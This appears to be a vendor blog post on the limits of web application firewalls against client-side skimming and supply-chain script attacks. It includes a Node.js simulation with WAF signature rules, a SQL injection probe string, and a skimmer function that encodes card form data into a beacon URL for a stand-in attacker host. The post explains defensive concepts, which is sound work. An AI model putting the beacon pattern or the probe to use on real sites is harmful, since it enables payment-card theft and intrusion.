Protecting client-side web applications and websites is a goal that straddles both the application development and cybersecurity industries. Bugs and vulnerabilities in web applications represent a significant portion of the most common attack paths. However, there remains a bit of a struggle as to who is responsible for protecting the client side. Is it the security team or is it the application development team? While application security is shifting further to the left, both teams need to improve collaboration throughout the software development lifecycle to integrate security earlier in the process and keep the client side safe from e-skimming, Magecart, formjacking, and other client-side attacks.
To protect their customers from client-side attacks, businesses have five primary tools at their disposal: web application firewalls (WAF), content security policy (CSP), penetration testing and assessments (vulnerability and security), client-side vulnerability scanning, and JavaScript security permissions.
We’ll explore all of these solutions in future blogs. To get started, let’s discuss WAFs and their limitations.
What is a WAF?
A WAF helps businesses protect their web applications by filtering and monitoring HTTP traffic between the application and the internet. It protects web applications from attacks such as cross-site request forgery (CSRF), cross-site scripting (XSS), and SQL injection. WAFs are deployed in front of web applications and analyze bi-directional web (HTTP) traffic, detecting and blocking anything that matches their rules. They are a useful first layer when defending against skimming attacks, but they can only do so much.
What WAF limitations do I need to be aware of?
WAFs are a special category of firewall designed specifically to protect web applications from application-layer attacks. They are deployed inline, in front of the application, to analyze web traffic and detect and block malicious or unauthorized requests. The PCI DSS guidance on application reviews and web application firewalls describes a WAF as a security policy enforcement point positioned between a web application and the client endpoint. The attacks a WAF is built to stop are the server-side classics: CSRF, XSS, file inclusion, and SQL injection.
However, a WAF is an open systems interconnection (OSI) layer 7 defense that protects the services a user-facing web application exposes to collect, store, and use data. It was never designed to protect the browser-level user interface itself. A skimmer runs in the visitor's browser, reads the payment form as it is filled in, and sends the data to a host the attacker controls; neither a third-party script the browser fetched directly from the vendor nor the exfiltration request to the attacker's host ever passes through your WAF, and the WAF does not execute JavaScript, so it cannot recognize a skimmer even when that code is served from your own origin. In other words, if a web application and its user experience is a house, then the WAF protects the walls, not the furniture or the people inside.
WAFs cannot protect businesses or their customers from:
- Sophisticated Skimming Malware
- A skimmer injected into a first-party script passes the WAF only as an obfuscated response body. WAF rules match request signatures such as SQL injection and XSS; they do not execute or analyze JavaScript, so the malicious code goes unrecognized.
- Drive-by Skimming and Supply Chain Attacks
- Third-party scripts (tag managers, analytics, chat widgets) are loaded by the browser straight from the vendor's servers and bypass your WAF entirely. A compromised script and the exfiltration request it sends to an attacker-controlled host never traverse your infrastructure, so the WAF can detect neither the manipulated JavaScript nor the data leaving the browser.
- Sideloading and Chainloading Attacks
- A legitimate script that loads further scripts at runtime pulls in code from hosts your WAF does not front. Skimming performed by sideloaded JavaScript code executes in the browser without a single request to your origin, and the WAF has nothing to inspect.
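The following Node.js script is an added example, not code from the original post, that models the vantage point described above: a WAF fronting one origin, a checkout page that pulls in a third-party script, and a formjacking skimmer that beacons the card form to an attacker host. The hostnames, the two signature rules, the card data and the request log are all constructed for illustration, and nothing here touches the network.

```javascript
// Added example, not code from the original post: a toy model of where a WAF sits
// and what it can see during a checkout that has been formjacked. Hostnames, rules
// and requests are constructed for illustration; nothing here touches the network.

const SITE_ORIGIN = "https://shop.example"; // the one origin the WAF fronts

// Request text the WAF matches signatures against (URL plus body, URL-decoded).
function inspectable(req) {
  const raw = `${req.url} ${req.body || ""}`;
  try {
    return decodeURIComponent(raw);
  } catch {
    return raw; // malformed percent-encoding: fall back to the raw text
  }
}

// Two deliberately simple signature rules of the kind a WAF ruleset ships with.
const WAF_RULES = [
  { name: "sqli", test: (req) => /['"]\s*(or|union|and)\s/i.test(inspectable(req)) },
  { name: "xss", test: (req) => /<script\b|javascript:/i.test(inspectable(req)) },
];

// A WAF is an inline reverse proxy in front of SITE_ORIGIN. It only ever sees
// requests addressed to that origin, and it matches signatures; it never executes JS.
function wafInspect(req) {
  if (!req.url.startsWith(SITE_ORIGIN)) {
    return { seen: false, action: "not-routed" }; // browser talked to some other host
  }
  const hit = WAF_RULES.find((rule) => rule.test(req));
  return { seen: true, action: hit ? `block:${hit.name}` : "allow" };
}

// Stand-in for what a formjacking skimmer does in the browser: read the payment
// form and beacon it to an attacker-controlled host. Only the resulting request
// object is built here; it is never sent.
function skimmerBeacon(formFields, exfilHost) {
  const payload = Buffer.from(JSON.stringify(formFields)).toString("base64");
  return { method: "GET", url: `${exfilHost}/pixel.gif?d=${payload}` };
}

// The browser's request log during one checkout, in order. Card data is constructed.
function simulateCheckout() {
  const form = { cc: "4111111111111111", exp: "12/29", cvv: "123" };
  const requests = [
    { method: "GET", url: `${SITE_ORIGIN}/checkout` },
    { method: "GET", url: `${SITE_ORIGIN}/search?q=' OR 1=1 --` }, // classic probe
    { method: "GET", url: "https://cdn.third-party.example/widget.js" }, // fetched straight from the vendor
    skimmerBeacon(form, "https://stats.attacker.example"), // exfiltration of the form
    { method: "POST", url: `${SITE_ORIGIN}/order`, body: "cc=4111111111111111&exp=12%2F29" },
  ];
  return requests.map((req) => ({ ...req, waf: wafInspect(req) }));
}

// The browser requests the WAF never saw at all: the supply-chain script and the exfil.
function wafBlindSpots(checkoutLog) {
  return checkoutLog.filter((entry) => !entry.waf.seen).map((entry) => entry.url);
}

for (const entry of simulateCheckout()) {
  console.log(`${entry.method.padEnd(4)} ${entry.url.slice(0, 60).padEnd(60)} -> ${entry.waf.action}`);
}
```

Run it with `node` and the log shows the SQL injection probe blocked and the legitimate order allowed, while the third-party script fetch and the beacon to the attacker host are marked not-routed: the WAF did its job on the traffic it was given and had no opportunity to see the two requests that matter for skimming.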
Are WAFs right for me?
Absolutely. WAFs are a good place to start protecting your business from client-side attacks. However, they block only some client-side threats, not all of them. As with everything in security, there is no silver bullet that protects your business and your customers from every cyberthreat. A WAF inspects the traffic between your customers' browsers and your servers, and its protection ends there: it cannot monitor or block browser-level threats that live outside your security perimeter. To learn more about WAFs and best practices for improving your client-side security, check out our white paper.
Next Steps
Implementing effective client-side security is crucial to ensuring the safety of your customer data, the integrity of your user experience, the functionality of your web applications and websites, and the ability of your business to grow and succeed. If you are on the long, arduous journey of building a client-side security program, check out our blog over the coming weeks as we cover the remaining four client-side security approaches: CSP, pentesting and assessments, client-side vulnerability scanning, and JavaScript security permissions.